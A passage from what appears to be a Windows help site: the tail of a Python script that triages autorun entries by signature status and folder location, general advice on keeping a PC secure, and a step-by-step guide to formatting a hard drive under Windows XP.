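        name = normcase(basename(path))    # Windows paths are case-insensitive
        folder = normcase(dirname(path))
        reasons = []
        # A publisher name alone proves nothing; only a verified signature counts.
        if not row["Signer"].startswith("(Verified)"):
            reasons.append("signature not verified")
        # A familiar filename in an unfamiliar folder is the disguise from step 6.
        expected = EXPECTED_DIR.get(name)
        if expected and folder != expected:
            reasons.append(f"{name} outside {expected}")
        if reasons:
            findings.append((row["Entry"], path, reasons))
    return findings


if __name__ == "__main__":
    for entry, path, reasons in triage(SAMPLE_CSV):
        print(f"{entry}: {path} -> {', '.join(reasons)}")
```

A flagged entry is a candidate for research, not proof of infection; confirm the file and folder before deleting anything.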


How to protect yourself in the future

In order to protect yourself from this happening again, it is important that you take proper care and precautions when using your computer. Make sure you have updated antivirus and spyware removal software running, all the latest updates to your operating system, a firewall, and only open attachments or click on popups that you know are safe. These precautions could be a tutorial unto themselves, and luckily, we have one created already:

Simple and easy ways to keep your computer safe and secure on the Internet

Please read this tutorial and follow the steps listed in order to be safe on the Internet. Other tutorials that are important to read in order to protect your computer are listed below.

Understanding Spyware, Browser Hijackers, and Dialers

Understanding and Using Firewalls

Safely Connecting a Computer to the Internet

Using Spybot - Search & Destroy to remove Spyware from Your Computer

Using Ad-Aware SE to remove Spyware & Hijackers from Your Computer

Using SpywareBlaster to protect your computer from Spyware, Hijackers, and Malware

Using IE-Spyad to enhance your privacy and Security

Format a Hard Drive With Windows XP

If you want to format a hard drive while using or installing Windows XP, you've come to the right place. This can be very useful for clearing everything off a secondary drive or when installing a fresh copy of Windows. Formatting a computer hard drive is simple and can help eliminate viruses, storage issues and other hard-to-resolve problems.

Preparation

Step1
When you format a computer hard drive you will lose everything that is on the drive. Therefore, it is very important to back up anything you might want later. Additionally, if you are going to be formatting and installing XP you need to make sure you have the discs for any applications or third party hardware you use since you will need to re-install your programs and drivers after re-installing Windows.
Step2
Take a moment to think of anything that you have on the computer that you wouldn't want to lose. Generally, you probably want everything in your My Documents folder, and you also want to save things like your favorites or bookmarks from your Web browser. Remember that each user on the computer has his or her own My Documents folder, Desktop items and Favorites/Bookmarks.
Step3
Save everything to a CD, DVD or a hard drive that you won't be formatting.

Formatting a Secondary Hard Drive

Step1
Right-Click on the “My Computer” icon either on your desktop or in the Start Menu and select “Manage.”

Step2
A new window titled “Computer Management” comes up. Select “Storage” from the left hand side by clicking it once, then select “Disk Management(local)” from the right side by double-clicking it.
Step3

Now in the lower part of the main frame (right side) of the window you should see a nice visual of all your hard drives. Each line is a different drive. Each box on a line (with a colored bar at the top and a size displayed in MB or GB) is a partition on the drive. Partitions are separations of space on a drive. Unless you are doing something specific that requires multiple partitions, you only want one partition per drive.

Step4
First you must delete any existing partitions on the drive you are going to format. Do this by right-clicking on the partition's box and selecting “Delete Partition...” Since you already know that you will be deleting everything on the drive, and have already backed everything up, you can safely say yes to any warning the computer presents you with.

Step5
If there are multiple partitions, make sure you have saved everything off them, since they might each have different drive letters (e.g. “D:” or “F:”). Then repeat the above step for each of them. If you only want to format one partition that is OK and you can continue to the next step without deleting the other partitions.

Step6
The box for the drive to be formatted should now have a black bar at the top of it and should say “Unallocated” under its size. Right-click on it and select “New Partition...” The New Partition Wizard comes up.

Step7
In the New Partition Wizard click next. On the next page make sure “Primary Partition” is selected and click next. Now make the size equal to the maximum (it should already be set to it), and click next again. On the next page the computer will automatically choose the first available drive letter for the new drive. However, if you like you can choose another drive letter from the drop-down menu, and then click next.

Step8
Finally the New Partition Wizard asks if you would like to format the new partition and if so what format. Choose “NTFS” as it is faster and more secure. Leave the “Allocation unit size” as “Default.” In the “Volume label” field enter whatever name you want the drive to have. Simple is better. Avoid using spaces. Lastly, if the drive is brand new and has never been used before check the “Perform a quick format” box. If the drive has been used before leave this box unchecked. Leave the “Enable file and folder compression” box unchecked and click next. Then on the next page click finish.

Step9
The wizard will now spend a little while formatting the drive. On old or large drives this may take a while. Do not close the “Computer Management” window until it finishes. You will know it is done when the word under the size of the drive changes from “Formatting” to “Healthy” and the name and drive letter you chose for the new drive show up. After it is finished you can proceed to use your newly formatted drive.

Formatting and Installing from the Windows XP CD

Step1
This section explains how to reformat a drive from the Windows XP installation CD. This can be used when installing a fresh copy of Windows onto a computer. Here it is especially important to backup all of your important information because upon formatting you will lose EVERYTHING that used to be on the drive. This includes all applications and device drivers, so you must back up everything you can.

Step2
Insert your Windows XP installation disc into your CD drive (Home or Pro--it does not matter).

Step3
Now, as your computer boots a little more, it will say “Press any key to boot from CD..” Press a key to do so.

Step4
The CD will load up a blue screen and then spend a while loading files it needs. When it is finished it will list a few options, mainly “Press ENTER to set up Windows XP.” Press Enter or Return.

Step5
Now you will be at a screen to select where to install Windows to. This is where you can delete old partitions and format drives. The box in the bottom half of the screen shows all your drives and the partitions that exist on them. Use the Up and Down arrow keys to highlight your “C:” partition and press the 'D' key (if all that shows up is “Unpartitioned space” and you have no C: or D: partitions, skip this step). On the next screen press the 'L' key to finalize deleting the partition.

Step6
Now you are back on the screen to choose where to install Windows. The box on the lower half of the screen should no longer show a partition but simply have an entry “Unpartitioned space xxxxxMB.” Select this with the arrow keys and press the 'C' key to create a partition on the drive. The next screen tells you the minimum and maximum sizes the partition can be and lets you pick the size. The default size is the maximum, but double check that the number entered is the maximum and hit enter.

Step7
Now you will again be back at the screen for choosing where to install Windows. But this time you will have a partition that looks something like this: “C: Partition1 [New (Raw)]xxxxxxMB.” Highlight this entry and press Enter.

Step8
The next screen lets you choose which file system to format the drive with. Choose NTFS as it is faster and more secure. If the drive is brand new and has never been used before, then use one of the options that ends in “(Quick).” Otherwise, choose one of the options lower down. Use the arrow keys to select the proper one and press Enter or Return.

Step9
From here you are all set and the installation of Windows will proceed starting with a format of your drive. This will take a while (over half an hour) so you can take a little break.